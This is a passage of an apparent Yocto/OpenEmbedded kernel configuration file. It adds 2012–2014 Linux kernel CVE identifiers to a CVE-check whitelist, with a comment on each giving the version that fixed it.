251CVE_CHECK_WHITELIST += "CVE-2012-6689"
252
253# fixed-version: Fixed after version 3.5rc1
254CVE_CHECK_WHITELIST += "CVE-2012-6701"
255
256# fixed-version: Fixed after version 3.7rc1
257CVE_CHECK_WHITELIST += "CVE-2012-6703"
258
259# fixed-version: Fixed after version 3.5rc1
260CVE_CHECK_WHITELIST += "CVE-2012-6704"
261
262# fixed-version: Fixed after version 3.4rc1
263CVE_CHECK_WHITELIST += "CVE-2012-6712"
264
265# fixed-version: Fixed after version 3.9rc1
266CVE_CHECK_WHITELIST += "CVE-2013-0160"
267
268# fixed-version: Fixed after version 3.8rc5
269CVE_CHECK_WHITELIST += "CVE-2013-0190"
270
271# fixed-version: Fixed after version 3.8rc7
272CVE_CHECK_WHITELIST += "CVE-2013-0216"
273
274# fixed-version: Fixed after version 3.8rc7
275CVE_CHECK_WHITELIST += "CVE-2013-0217"
276
277# fixed-version: Fixed after version 3.8
278CVE_CHECK_WHITELIST += "CVE-2013-0228"
279
280# fixed-version: Fixed after version 3.8rc7
281CVE_CHECK_WHITELIST += "CVE-2013-0231"
282
283# fixed-version: Fixed after version 3.8rc6
284CVE_CHECK_WHITELIST += "CVE-2013-0268"
285
286# fixed-version: Fixed after version 3.8
287CVE_CHECK_WHITELIST += "CVE-2013-0290"
288
289# fixed-version: Fixed after version 3.7rc1
290CVE_CHECK_WHITELIST += "CVE-2013-0309"
291
292# fixed-version: Fixed after version 3.5
293CVE_CHECK_WHITELIST += "CVE-2013-0310"
294
295# fixed-version: Fixed after version 3.7rc8
296CVE_CHECK_WHITELIST += "CVE-2013-0311"
297
298# fixed-version: Fixed after version 3.8rc5
299CVE_CHECK_WHITELIST += "CVE-2013-0313"
300
301# fixed-version: Fixed after version 3.11rc7
302CVE_CHECK_WHITELIST += "CVE-2013-0343"
303
304# fixed-version: Fixed after version 3.8rc6
305CVE_CHECK_WHITELIST += "CVE-2013-0349"
306
307# fixed-version: Fixed after version 3.8rc5
308CVE_CHECK_WHITELIST += "CVE-2013-0871"
309
310# fixed-version: Fixed after version 3.9rc4
311CVE_CHECK_WHITELIST += "CVE-2013-0913"
312
313# fixed-version: Fixed after version 3.9rc3
314CVE_CHECK_WHITELIST += "CVE-2013-0914"
315
316# fixed-version: Fixed after version 3.11rc1
317CVE_CHECK_WHITELIST += "CVE-2013-1059"
318
319# fixed-version: Fixed after version 3.9rc1
320CVE_CHECK_WHITELIST += "CVE-2013-1763"
321
322# fixed-version: Fixed after version 3.9rc1
323CVE_CHECK_WHITELIST += "CVE-2013-1767"
324
325# fixed-version: Fixed after version 3.5rc1
326CVE_CHECK_WHITELIST += "CVE-2013-1772"
327
328# fixed-version: Fixed after version 3.3rc1
329CVE_CHECK_WHITELIST += "CVE-2013-1773"
330
331# fixed-version: Fixed after version 3.8rc5
332CVE_CHECK_WHITELIST += "CVE-2013-1774"
333
334# fixed-version: Fixed after version 3.9rc3
335CVE_CHECK_WHITELIST += "CVE-2013-1792"
336
337# fixed-version: Fixed after version 3.9rc4
338CVE_CHECK_WHITELIST += "CVE-2013-1796"
339
340# fixed-version: Fixed after version 3.9rc4
341CVE_CHECK_WHITELIST += "CVE-2013-1797"
342
343# fixed-version: Fixed after version 3.9rc4
344CVE_CHECK_WHITELIST += "CVE-2013-1798"
345
346# fixed-version: Fixed after version 3.8rc6
347CVE_CHECK_WHITELIST += "CVE-2013-1819"
348
349# fixed-version: Fixed after version 3.6rc7
350CVE_CHECK_WHITELIST += "CVE-2013-1826"
351
352# fixed-version: Fixed after version 3.6rc3
353CVE_CHECK_WHITELIST += "CVE-2013-1827"
354
355# fixed-version: Fixed after version 3.9rc2
356CVE_CHECK_WHITELIST += "CVE-2013-1828"
357
358# fixed-version: Fixed after version 3.9rc3
359CVE_CHECK_WHITELIST += "CVE-2013-1848"
360
361# fixed-version: Fixed after version 3.9rc3
362CVE_CHECK_WHITELIST += "CVE-2013-1858"
363
364# fixed-version: Fixed after version 3.9rc3
365CVE_CHECK_WHITELIST += "CVE-2013-1860"
366
367# fixed-version: Fixed after version 3.7rc3
368CVE_CHECK_WHITELIST += "CVE-2013-1928"
369
370# fixed-version: Fixed after version 3.9rc6
371CVE_CHECK_WHITELIST += "CVE-2013-1929"
372
373# Skipping CVE-2013-1935, no affected_versions
374
375# fixed-version: Fixed after version 3.0rc1
376CVE_CHECK_WHITELIST += "CVE-2013-1943"
377
378# fixed-version: Fixed after version 3.9rc5
379CVE_CHECK_WHITELIST += "CVE-2013-1956"
380
381# fixed-version: Fixed after version 3.9rc5
382CVE_CHECK_WHITELIST += "CVE-2013-1957"
383
384# fixed-version: Fixed after version 3.9rc5
385CVE_CHECK_WHITELIST += "CVE-2013-1958"
386
387# fixed-version: Fixed after version 3.9rc7
388CVE_CHECK_WHITELIST += "CVE-2013-1959"
389
390# fixed-version: Fixed after version 3.9rc8
391CVE_CHECK_WHITELIST += "CVE-2013-1979"
392
393# fixed-version: Fixed after version 3.8rc2
394CVE_CHECK_WHITELIST += "CVE-2013-2015"
395
396# fixed-version: Fixed after version 2.6.34
397CVE_CHECK_WHITELIST += "CVE-2013-2017"
398
399# fixed-version: Fixed after version 3.8rc4
400CVE_CHECK_WHITELIST += "CVE-2013-2058"
401
402# fixed-version: Fixed after version 3.9rc8
403CVE_CHECK_WHITELIST += "CVE-2013-2094"
404
405# fixed-version: Fixed after version 2.6.34rc4
406CVE_CHECK_WHITELIST += "CVE-2013-2128"
407
408# fixed-version: Fixed after version 3.11rc3
409CVE_CHECK_WHITELIST += "CVE-2013-2140"
410
411# fixed-version: Fixed after version 3.9rc8
412CVE_CHECK_WHITELIST += "CVE-2013-2141"
413
414# fixed-version: Fixed after version 3.9rc8
415CVE_CHECK_WHITELIST += "CVE-2013-2146"
416
417# fixed-version: Fixed after version 3.12rc3
418CVE_CHECK_WHITELIST += "CVE-2013-2147"
419
420# fixed-version: Fixed after version 3.11rc1
421CVE_CHECK_WHITELIST += "CVE-2013-2148"
422
423# fixed-version: Fixed after version 3.11rc1
424CVE_CHECK_WHITELIST += "CVE-2013-2164"
425
426# Skipping CVE-2013-2188, no affected_versions
427
428# fixed-version: Fixed after version 3.9rc4
429CVE_CHECK_WHITELIST += "CVE-2013-2206"
430
431# Skipping CVE-2013-2224, no affected_versions
432
433# fixed-version: Fixed after version 3.10
434CVE_CHECK_WHITELIST += "CVE-2013-2232"
435
436# fixed-version: Fixed after version 3.10
437CVE_CHECK_WHITELIST += "CVE-2013-2234"
438
439# fixed-version: Fixed after version 3.9rc6
440CVE_CHECK_WHITELIST += "CVE-2013-2237"
441
442# Skipping CVE-2013-2239, no affected_versions
443
444# fixed-version: Fixed after version 3.9rc1
445CVE_CHECK_WHITELIST += "CVE-2013-2546"
446
447# fixed-version: Fixed after version 3.9rc1
448CVE_CHECK_WHITELIST += "CVE-2013-2547"
449
450# fixed-version: Fixed after version 3.9rc1
451CVE_CHECK_WHITELIST += "CVE-2013-2548"
452
453# fixed-version: Fixed after version 3.9rc8
454CVE_CHECK_WHITELIST += "CVE-2013-2596"
455
456# fixed-version: Fixed after version 3.9rc3
457CVE_CHECK_WHITELIST += "CVE-2013-2634"
458
459# fixed-version: Fixed after version 3.9rc3
460CVE_CHECK_WHITELIST += "CVE-2013-2635"
461
462# fixed-version: Fixed after version 3.9rc3
463CVE_CHECK_WHITELIST += "CVE-2013-2636"
464
465# fixed-version: Fixed after version 3.10rc4
466CVE_CHECK_WHITELIST += "CVE-2013-2850"
467
468# fixed-version: Fixed after version 3.11rc1
469CVE_CHECK_WHITELIST += "CVE-2013-2851"
470
471# fixed-version: Fixed after version 3.10rc6
472CVE_CHECK_WHITELIST += "CVE-2013-2852"
473
474# fixed-version: Fixed after version 3.12rc1
475CVE_CHECK_WHITELIST += "CVE-2013-2888"
476
477# fixed-version: Fixed after version 3.12rc2
478CVE_CHECK_WHITELIST += "CVE-2013-2889"
479
480# fixed-version: Fixed after version 3.12rc2
481CVE_CHECK_WHITELIST += "CVE-2013-2890"
482
483# fixed-version: Fixed after version 3.12rc2
484CVE_CHECK_WHITELIST += "CVE-2013-2891"
485
486# fixed-version: Fixed after version 3.12rc1
487CVE_CHECK_WHITELIST += "CVE-2013-2892"
488
489# fixed-version: Fixed after version 3.12rc2
490CVE_CHECK_WHITELIST += "CVE-2013-2893"
491
492# fixed-version: Fixed after version 3.12rc2
493CVE_CHECK_WHITELIST += "CVE-2013-2894"
494
495# fixed-version: Fixed after version 3.12rc2
496CVE_CHECK_WHITELIST += "CVE-2013-2895"
497
498# fixed-version: Fixed after version 3.12rc1
499CVE_CHECK_WHITELIST += "CVE-2013-2896"
500
501# fixed-version: Fixed after version 3.12rc2
502CVE_CHECK_WHITELIST += "CVE-2013-2897"
503
504# fixed-version: Fixed after version 3.12rc1
505CVE_CHECK_WHITELIST += "CVE-2013-2898"
506
507# fixed-version: Fixed after version 3.12rc1
508CVE_CHECK_WHITELIST += "CVE-2013-2899"
509
510# fixed-version: Fixed after version 3.13rc1
511CVE_CHECK_WHITELIST += "CVE-2013-2929"
512
513# fixed-version: Fixed after version 3.13rc1
514CVE_CHECK_WHITELIST += "CVE-2013-2930"
515
516# fixed-version: Fixed after version 3.9
517CVE_CHECK_WHITELIST += "CVE-2013-3076"
518
519# fixed-version: Fixed after version 3.9rc7
520CVE_CHECK_WHITELIST += "CVE-2013-3222"
521
522# fixed-version: Fixed after version 3.9rc7
523CVE_CHECK_WHITELIST += "CVE-2013-3223"
524
525# fixed-version: Fixed after version 3.9rc7
526CVE_CHECK_WHITELIST += "CVE-2013-3224"
527
528# fixed-version: Fixed after version 3.9rc7
529CVE_CHECK_WHITELIST += "CVE-2013-3225"
530
531# fixed-version: Fixed after version 3.9rc7
532CVE_CHECK_WHITELIST += "CVE-2013-3226"
533
534# fixed-version: Fixed after version 3.9rc7
535CVE_CHECK_WHITELIST += "CVE-2013-3227"
536
537# fixed-version: Fixed after version 3.9rc7
538CVE_CHECK_WHITELIST += "CVE-2013-3228"
539
540# fixed-version: Fixed after version 3.9rc7
541CVE_CHECK_WHITELIST += "CVE-2013-3229"
542
543# fixed-version: Fixed after version 3.9rc7
544CVE_CHECK_WHITELIST += "CVE-2013-3230"
545
546# fixed-version: Fixed after version 3.9rc7
547CVE_CHECK_WHITELIST += "CVE-2013-3231"
548
549# fixed-version: Fixed after version 3.9rc7
550CVE_CHECK_WHITELIST += "CVE-2013-3232"
551
552# fixed-version: Fixed after version 3.9rc7
553CVE_CHECK_WHITELIST += "CVE-2013-3233"
554
555# fixed-version: Fixed after version 3.9rc7
556CVE_CHECK_WHITELIST += "CVE-2013-3234"
557
558# fixed-version: Fixed after version 3.9rc7
559CVE_CHECK_WHITELIST += "CVE-2013-3235"
560
561# fixed-version: Fixed after version 3.9rc7
562CVE_CHECK_WHITELIST += "CVE-2013-3236"
563
564# fixed-version: Fixed after version 3.9rc7
565CVE_CHECK_WHITELIST += "CVE-2013-3237"
566
567# fixed-version: Fixed after version 3.9rc7
568CVE_CHECK_WHITELIST += "CVE-2013-3301"
569
570# fixed-version: Fixed after version 3.8rc3
571CVE_CHECK_WHITELIST += "CVE-2013-3302"
572
573# fixed-version: Fixed after version 3.11rc1
574CVE_CHECK_WHITELIST += "CVE-2013-4125"
575
576# fixed-version: Fixed after version 3.11rc1
577CVE_CHECK_WHITELIST += "CVE-2013-4127"
578
579# fixed-version: Fixed after version 3.11rc1
580CVE_CHECK_WHITELIST += "CVE-2013-4129"
581
582# fixed-version: Fixed after version 3.11rc1
583CVE_CHECK_WHITELIST += "CVE-2013-4162"
584
585# fixed-version: Fixed after version 3.11rc1
586CVE_CHECK_WHITELIST += "CVE-2013-4163"
587
588# fixed-version: Fixed after version 3.11rc5
589CVE_CHECK_WHITELIST += "CVE-2013-4205"
590
591# fixed-version: Fixed after version 3.10rc4
592CVE_CHECK_WHITELIST += "CVE-2013-4220"
593
594# fixed-version: Fixed after version 3.10rc5
595CVE_CHECK_WHITELIST += "CVE-2013-4247"
596
597# fixed-version: Fixed after version 3.11rc6
598CVE_CHECK_WHITELIST += "CVE-2013-4254"
599
600# fixed-version: Fixed after version 3.12rc4
601CVE_CHECK_WHITELIST += "CVE-2013-4270"
602
603# fixed-version: Fixed after version 3.12rc6
604CVE_CHECK_WHITELIST += "CVE-2013-4299"
605
606# fixed-version: Fixed after version 3.11
607CVE_CHECK_WHITELIST += "CVE-2013-4300"
608
609# fixed-version: Fixed after version 4.5rc1
610CVE_CHECK_WHITELIST += "CVE-2013-4312"
611
612# fixed-version: Fixed after version 3.12rc2
613CVE_CHECK_WHITELIST += "CVE-2013-4343"
614
615# fixed-version: Fixed after version 3.13rc2
616CVE_CHECK_WHITELIST += "CVE-2013-4345"
617
618# fixed-version: Fixed after version 3.13rc1
619CVE_CHECK_WHITELIST += "CVE-2013-4348"
620
621# fixed-version: Fixed after version 3.12rc2
622CVE_CHECK_WHITELIST += "CVE-2013-4350"
623
624# fixed-version: Fixed after version 3.12rc4
625CVE_CHECK_WHITELIST += "CVE-2013-4387"
626
627# fixed-version: Fixed after version 3.12rc7
628CVE_CHECK_WHITELIST += "CVE-2013-4470"
629
630# fixed-version: Fixed after version 3.10rc1
631CVE_CHECK_WHITELIST += "CVE-2013-4483"
632
633# fixed-version: Fixed after version 3.12
634CVE_CHECK_WHITELIST += "CVE-2013-4511"
635
636# fixed-version: Fixed after version 3.12
637CVE_CHECK_WHITELIST += "CVE-2013-4512"
638
639# fixed-version: Fixed after version 3.12
640CVE_CHECK_WHITELIST += "CVE-2013-4513"
641
642# fixed-version: Fixed after version 3.12
643CVE_CHECK_WHITELIST += "CVE-2013-4514"
644
645# fixed-version: Fixed after version 3.12
646CVE_CHECK_WHITELIST += "CVE-2013-4515"
647
648# fixed-version: Fixed after version 3.12
649CVE_CHECK_WHITELIST += "CVE-2013-4516"
650
651# fixed-version: Fixed after version 3.13rc1
652CVE_CHECK_WHITELIST += "CVE-2013-4563"
653
654# fixed-version: Fixed after version 3.13rc7
655CVE_CHECK_WHITELIST += "CVE-2013-4579"
656
657# fixed-version: Fixed after version 3.13rc4
658CVE_CHECK_WHITELIST += "CVE-2013-4587"
659
660# fixed-version: Fixed after version 2.6.33rc4
661CVE_CHECK_WHITELIST += "CVE-2013-4588"
662
663# fixed-version: Fixed after version 3.8rc1
664CVE_CHECK_WHITELIST += "CVE-2013-4591"
665
666# fixed-version: Fixed after version 3.7rc1
667CVE_CHECK_WHITELIST += "CVE-2013-4592"
668
669# Skipping CVE-2013-4737, no affected_versions
670
671# Skipping CVE-2013-4738, no affected_versions
672
673# Skipping CVE-2013-4739, no affected_versions
674
675# fixed-version: Fixed after version 3.10rc5
676CVE_CHECK_WHITELIST += "CVE-2013-5634"
677
678# fixed-version: Fixed after version 3.6rc6
679CVE_CHECK_WHITELIST += "CVE-2013-6282"
680
681# fixed-version: Fixed after version 3.13rc4
682CVE_CHECK_WHITELIST += "CVE-2013-6367"
683
684# fixed-version: Fixed after version 3.13rc4
685CVE_CHECK_WHITELIST += "CVE-2013-6368"
686
687# fixed-version: Fixed after version 3.13rc4
688CVE_CHECK_WHITELIST += "CVE-2013-6376"
689
690# fixed-version: Fixed after version 3.13rc1
691CVE_CHECK_WHITELIST += "CVE-2013-6378"
692
693# fixed-version: Fixed after version 3.13rc1
694CVE_CHECK_WHITELIST += "CVE-2013-6380"
695
696# fixed-version: Fixed after version 3.13rc1
697CVE_CHECK_WHITELIST += "CVE-2013-6381"
698
699# fixed-version: Fixed after version 3.13rc4
700CVE_CHECK_WHITELIST += "CVE-2013-6382"
701
702# fixed-version: Fixed after version 3.12
703CVE_CHECK_WHITELIST += "CVE-2013-6383"
704
705# Skipping CVE-2013-6392, no affected_versions
706
707# fixed-version: Fixed after version 3.12rc1
708CVE_CHECK_WHITELIST += "CVE-2013-6431"
709
710# fixed-version: Fixed after version 3.13rc1
711CVE_CHECK_WHITELIST += "CVE-2013-6432"
712
713# fixed-version: Fixed after version 3.14rc1
714CVE_CHECK_WHITELIST += "CVE-2013-6885"
715
716# fixed-version: Fixed after version 3.13rc1
717CVE_CHECK_WHITELIST += "CVE-2013-7026"
718
719# fixed-version: Fixed after version 3.12rc7
720CVE_CHECK_WHITELIST += "CVE-2013-7027"
721
722# fixed-version: Fixed after version 3.13rc1
723CVE_CHECK_WHITELIST += "CVE-2013-7263"
724
725# fixed-version: Fixed after version 3.13rc1
726CVE_CHECK_WHITELIST += "CVE-2013-7264"
727
728# fixed-version: Fixed after version 3.13rc1
729CVE_CHECK_WHITELIST += "CVE-2013-7265"
730
731# fixed-version: Fixed after version 3.13rc1
732CVE_CHECK_WHITELIST += "CVE-2013-7266"
733
734# fixed-version: Fixed after version 3.13rc1
735CVE_CHECK_WHITELIST += "CVE-2013-7267"
736
737# fixed-version: Fixed after version 3.13rc1
738CVE_CHECK_WHITELIST += "CVE-2013-7268"
739
740# fixed-version: Fixed after version 3.13rc1
741CVE_CHECK_WHITELIST += "CVE-2013-7269"
742
743# fixed-version: Fixed after version 3.13rc1
744CVE_CHECK_WHITELIST += "CVE-2013-7270"
745
746# fixed-version: Fixed after version 3.13rc1
747CVE_CHECK_WHITELIST += "CVE-2013-7271"
748
749# fixed-version: Fixed after version 3.13rc1
750CVE_CHECK_WHITELIST += "CVE-2013-7281"
751
752# fixed-version: Fixed after version 3.13rc7
753CVE_CHECK_WHITELIST += "CVE-2013-7339"
754
755# fixed-version: Fixed after version 3.13rc1
756CVE_CHECK_WHITELIST += "CVE-2013-7348"
757
758# fixed-version: Fixed after version 3.19rc1
759CVE_CHECK_WHITELIST += "CVE-2013-7421"
760
761# CVE-2013-7445 has no known resolution
762
763# fixed-version: Fixed after version 4.4rc4
764CVE_CHECK_WHITELIST += "CVE-2013-7446"
765
766# fixed-version: Fixed after version 3.12rc7
767CVE_CHECK_WHITELIST += "CVE-2013-7470"
768
769# fixed-version: Fixed after version 3.14rc1
770CVE_CHECK_WHITELIST += "CVE-2014-0038"
771
772# fixed-version: Fixed after version 3.14rc5
773CVE_CHECK_WHITELIST += "CVE-2014-0049"
774
775# fixed-version: Fixed after version 3.14
776CVE_CHECK_WHITELIST += "CVE-2014-0055"
777
778# fixed-version: Fixed after version 3.14rc4
779CVE_CHECK_WHITELIST += "CVE-2014-0069"
780
781# fixed-version: Fixed after version 3.14
782CVE_CHECK_WHITELIST += "CVE-2014-0077"
783
784# fixed-version: Fixed after version 3.14rc7
785CVE_CHECK_WHITELIST += "CVE-2014-0100"
786
787# fixed-version: Fixed after version 3.14rc6
788CVE_CHECK_WHITELIST += "CVE-2014-0101"
789
790# fixed-version: Fixed after version 3.14rc6
791CVE_CHECK_WHITELIST += "CVE-2014-0102"
792
793# fixed-version: Fixed after version 3.14rc7
794CVE_CHECK_WHITELIST += "CVE-2014-0131"
795
796# fixed-version: Fixed after version 3.15rc2
797CVE_CHECK_WHITELIST += "CVE-2014-0155"
798
799# fixed-version: Fixed after version 3.15rc5
800CVE_CHECK_WHITELIST += "CVE-2014-0181"
801
802# fixed-version: Fixed after version 3.15rc5
803CVE_CHECK_WHITELIST += "CVE-2014-0196"
804
805# fixed-version: Fixed after version 2.6.33rc5
806CVE_CHECK_WHITELIST += "CVE-2014-0203"
807
808# fixed-version: Fixed after version 2.6.37rc1
809CVE_CHECK_WHITELIST += "CVE-2014-0205"
810
811# fixed-version: Fixed after version 3.16rc3
812CVE_CHECK_WHITELIST += "CVE-2014-0206"
813
814# Skipping CVE-2014-0972, no affected_versions
815
816# fixed-version: Fixed after version 3.13
817CVE_CHECK_WHITELIST += "CVE-2014-1438"
818
819# fixed-version: Fixed after version 3.12rc7
820CVE_CHECK_WHITELIST += "CVE-2014-1444"
821
822# fixed-version: Fixed after version 3.12rc7
823CVE_CHECK_WHITELIST += "CVE-2014-1445"
824
825# fixed-version: Fixed after version 3.13rc7
826CVE_CHECK_WHITELIST += "CVE-2014-1446"
827
828# fixed-version: Fixed after version 3.13rc8
829CVE_CHECK_WHITELIST += "CVE-2014-1690"
830
831# fixed-version: Fixed after version 3.15rc5
832CVE_CHECK_WHITELIST += "CVE-2014-1737"
833
834# fixed-version: Fixed after version 3.15rc5
835CVE_CHECK_WHITELIST += "CVE-2014-1738"
836
837# fixed-version: Fixed after version 3.15rc6
838CVE_CHECK_WHITELIST += "CVE-2014-1739"
839
840# fixed-version: Fixed after version 3.14rc2
841CVE_CHECK_WHITELIST += "CVE-2014-1874"
842
843# fixed-version: Fixed after version 3.14rc1
844CVE_CHECK_WHITELIST += "CVE-2014-2038"
845
846# fixed-version: Fixed after version 3.14rc3
847CVE_CHECK_WHITELIST += "CVE-2014-2039"
848
849# fixed-version: Fixed after version 3.14rc7
850CVE_CHECK_WHITELIST += "CVE-2014-2309"
851
852# fixed-version: Fixed after version 3.14rc1
853CVE_CHECK_WHITELIST += "CVE-2014-2523"
854
855# fixed-version: Fixed after version 3.14
856CVE_CHECK_WHITELIST += "CVE-2014-2568"
857
858# fixed-version: Fixed after version 3.15rc1
859CVE_CHECK_WHITELIST += "CVE-2014-2580"
860
861# fixed-version: Fixed after version 3.14rc6
862CVE_CHECK_WHITELIST += "CVE-2014-2672"
863
864# fixed-version: Fixed after version 3.14rc6
865CVE_CHECK_WHITELIST += "CVE-2014-2673"
866
867# fixed-version: Fixed after version 3.15rc1
868CVE_CHECK_WHITELIST += "CVE-2014-2678"
869
870# fixed-version: Fixed after version 3.14rc6
871CVE_CHECK_WHITELIST += "CVE-2014-2706"
872
873# fixed-version: Fixed after version 3.15rc1
874CVE_CHECK_WHITELIST += "CVE-2014-2739"
875
876# fixed-version: Fixed after version 3.15rc2
877CVE_CHECK_WHITELIST += "CVE-2014-2851"
878
879# fixed-version: Fixed after version 3.2rc7
880CVE_CHECK_WHITELIST += "CVE-2014-2889"
881
882# fixed-version: Fixed after version 3.15rc1
883CVE_CHECK_WHITELIST += "CVE-2014-3122"
884
885# fixed-version: Fixed after version 3.15rc2
886CVE_CHECK_WHITELIST += "CVE-2014-3144"
887
888# fixed-version: Fixed after version 3.15rc2
889CVE_CHECK_WHITELIST += "CVE-2014-3145"
890
891# fixed-version: Fixed after version 3.15
892CVE_CHECK_WHITELIST += "CVE-2014-3153"
893
894# fixed-version: Fixed after version 3.17rc4
895CVE_CHECK_WHITELIST += "CVE-2014-3180"
896
897# fixed-version: Fixed after version 3.17rc3
898CVE_CHECK_WHITELIST += "CVE-2014-3181"
899
900# fixed-version: Fixed after version 3.17rc2
901CVE_CHECK_WHITELIST += "CVE-2014-3182"
902
903# fixed-version: Fixed after version 3.17rc2
904CVE_CHECK_WHITELIST += "CVE-2014-3183"
905
906# fixed-version: Fixed after version 3.17rc2
907CVE_CHECK_WHITELIST += "CVE-2014-3184"
908
909# fixed-version: Fixed after version 3.17rc3
910CVE_CHECK_WHITELIST += "CVE-2014-3185"
911
912# fixed-version: Fixed after version 3.17rc3
913CVE_CHECK_WHITELIST += "CVE-2014-3186"
914
915# Skipping CVE-2014-3519, no affected_versions
916
917# fixed-version: Fixed after version 3.16rc7
918CVE_CHECK_WHITELIST += "CVE-2014-3534"
919
920# fixed-version: Fixed after version 2.6.36rc1
921CVE_CHECK_WHITELIST += "CVE-2014-3535"
922
923# fixed-version: Fixed after version 3.17rc2
924CVE_CHECK_WHITELIST += "CVE-2014-3601"
925
926# fixed-version: Fixed after version 3.18rc2
927CVE_CHECK_WHITELIST += "CVE-2014-3610"
928
929# fixed-version: Fixed after version 3.18rc2
930CVE_CHECK_WHITELIST += "CVE-2014-3611"
931
932# fixed-version: Fixed after version 3.17rc5
933CVE_CHECK_WHITELIST += "CVE-2014-3631"
934
935# fixed-version: Fixed after version 3.12rc1
936CVE_CHECK_WHITELIST += "CVE-2014-3645"
937
938# fixed-version: Fixed after version 3.18rc2
939CVE_CHECK_WHITELIST += "CVE-2014-3646"
940
941# fixed-version: Fixed after version 3.18rc2
942CVE_CHECK_WHITELIST += "CVE-2014-3647"
943
944# fixed-version: Fixed after version 3.18rc1
945CVE_CHECK_WHITELIST += "CVE-2014-3673"
946
947# fixed-version: Fixed after version 3.18rc1
948CVE_CHECK_WHITELIST += "CVE-2014-3687"
949
950# fixed-version: Fixed after version 3.18rc1
951CVE_CHECK_WHITELIST += "CVE-2014-3688"
952
953# fixed-version: Fixed after version 3.18rc1
954CVE_CHECK_WHITELIST += "CVE-2014-3690"
955
956# fixed-version: Fixed after version 3.16rc1
957CVE_CHECK_WHITELIST += "CVE-2014-3917"
958
959# fixed-version: Fixed after version 3.15
960CVE_CHECK_WHITELIST += "CVE-2014-3940"
961
962# fixed-version: Fixed after version 3.16rc1
963CVE_CHECK_WHITELIST += "CVE-2014-4014"
964
965# fixed-version: Fixed after version 3.14rc1
966CVE_CHECK_WHITELIST += "CVE-2014-4027"
967
968# fixed-version: Fixed after version 3.15rc1
969CVE_CHECK_WHITELIST += "CVE-2014-4157"
970
971# fixed-version: Fixed after version 3.16rc3
972CVE_CHECK_WHITELIST += "CVE-2014-4171"
973
974# Skipping CVE-2014-4322, no affected_versions
975
976# Skipping CVE-2014-4323, no affected_versions
977
978# fixed-version: Fixed after version 3.16rc3
979CVE_CHECK_WHITELIST += "CVE-2014-4508"
980
981# fixed-version: Fixed after version 3.18rc1
982CVE_CHECK_WHITELIST += "CVE-2014-4608"
983
984# fixed-version: Fixed after version 3.16rc3
985CVE_CHECK_WHITELIST += "CVE-2014-4611"
986
987# fixed-version: Fixed after version 3.16rc2
988CVE_CHECK_WHITELIST += "CVE-2014-4652"
989
990# fixed-version: Fixed after version 3.16rc2
991CVE_CHECK_WHITELIST += "CVE-2014-4653"
992
993# fixed-version: Fixed after version 3.16rc2
994CVE_CHECK_WHITELIST += "CVE-2014-4654"
995
996# fixed-version: Fixed after version 3.16rc2
997CVE_CHECK_WHITELIST += "CVE-2014-4655"
998
999# fixed-version: Fixed after version 3.16rc2
1000CVE_CHECK_WHITELIST += "CVE-2014-4656"
1001
1002# fixed-version: Fixed after version 3.16rc1
1003CVE_CHECK_WHITELIST += "CVE-2014-4667"
1004
1005# fixed-version: Fixed after version 3.16rc4
1006CVE_CHECK_WHITELIST += "CVE-2014-4699"
1007
1008# fixed-version: Fixed after version 3.16rc6
1009CVE_CHECK_WHITELIST += "CVE-2014-4943"
1010
1011# fixed-version: Fixed after version 3.16rc7
1012CVE_CHECK_WHITELIST += "CVE-2014-5045"
1013
1014# fixed-version: Fixed after version 3.16
1015CVE_CHECK_WHITELIST += "CVE-2014-5077"
1016
1017# fixed-version: Fixed after version 3.17rc1
1018CVE_CHECK_WHITELIST += "CVE-2014-5206"
1019
1020# fixed-version: Fixed after version 3.17rc1
1021CVE_CHECK_WHITELIST += "CVE-2014-5207"
1022
1023# Skipping CVE-2014-5332, no affected_versions
1024
1025# fixed-version: Fixed after version 3.17rc2
1026CVE_CHECK_WHITELIST += "CVE-2014-5471"
1027
1028# fixed-version: Fixed after version 3.17rc2
1029CVE_CHECK_WHITELIST += "CVE-2014-5472"
1030
1031# fixed-version: Fixed after version 3.17rc5
1032CVE_CHECK_WHITELIST += "CVE-2014-6410"
1033
1034# fixed-version: Fixed after version 3.17rc5
1035CVE_CHECK_WHITELIST += "CVE-2014-6416"
1036
1037# fixed-version: Fixed after version 3.17rc5
1038CVE_CHECK_WHITELIST += "CVE-2014-6417"
1039
1040# fixed-version: Fixed after version 3.17rc5
1041CVE_CHECK_WHITELIST += "CVE-2014-6418"
1042
1043# fixed-version: Fixed after version 3.17rc2
1044CVE_CHECK_WHITELIST += "CVE-2014-7145"
1045
1046# Skipping CVE-2014-7207, no affected_versions
1047
1048# fixed-version: Fixed after version 3.15rc1
1049CVE_CHECK_WHITELIST += "CVE-2014-7283"
1050
1051# fixed-version: Fixed after version 3.15rc7
1052CVE_CHECK_WHITELIST += "CVE-2014-7284"
1053
1054# fixed-version: Fixed after version 3.16rc1
1055CVE_CHECK_WHITELIST += "CVE-2014-7822"
1056
1057# fixed-version: Fixed after version 3.18rc3
1058CVE_CHECK_WHITELIST += "CVE-2014-7825"
1059
1060# fixed-version: Fixed after version 3.18rc3
1061CVE_CHECK_WHITELIST += "CVE-2014-7826"
1062
1063# fixed-version: Fixed after version 3.18rc5
1064CVE_CHECK_WHITELIST += "CVE-2014-7841"
1065
1066# fixed-version: Fixed after version 3.18rc1
1067CVE_CHECK_WHITELIST += "CVE-2014-7842"
1068
1069# fixed-version: Fixed after version 3.18rc5
1070CVE_CHECK_WHITELIST += "CVE-2014-7843"
1071
1072# fixed-version: Fixed after version 3.18rc1
1073CVE_CHECK_WHITELIST += "CVE-2014-7970"
1074
1075# fixed-version: Fixed after version 3.18rc1
1076CVE_CHECK_WHITELIST += "CVE-2014-7975"
1077
1078# fixed-version: Fixed after version 3.18rc3
1079CVE_CHECK_WHITELIST += "CVE-2014-8086"
1080
1081# fixed-version: Fixed after version 3.19rc1
1082CVE_CHECK_WHITELIST += "CVE-2014-8133"
1083
1084# fixed-version: Fixed after version 3.19rc1
1085CVE_CHECK_WHITELIST += "CVE-2014-8134"
1086
1087# fixed-version: Fixed after version 4.0rc7
1088CVE_CHECK_WHITELIST += "CVE-2014-8159"
1089
1090# fixed-version: Fixed after version 3.18rc1
1091CVE_CHECK_WHITELIST += "CVE-2014-8160"
1092
1093# fixed-version: Fixed after version 3.12rc1
1094CVE_CHECK_WHITELIST += "CVE-2014-8171"
1095
1096# fixed-version: Fixed after version 3.13rc1
1097CVE_CHECK_WHITELIST += "CVE-2014-8172"
1098
1099# fixed-version: Fixed after version 3.13rc5
1100CVE_CHECK_WHITELIST += "CVE-2014-8173"
1101
1102# Skipping CVE-2014-8181, no affected_versions
1103
1104# fixed-version: Fixed after version 3.18rc2
1105CVE_CHECK_WHITELIST += "CVE-2014-8369"
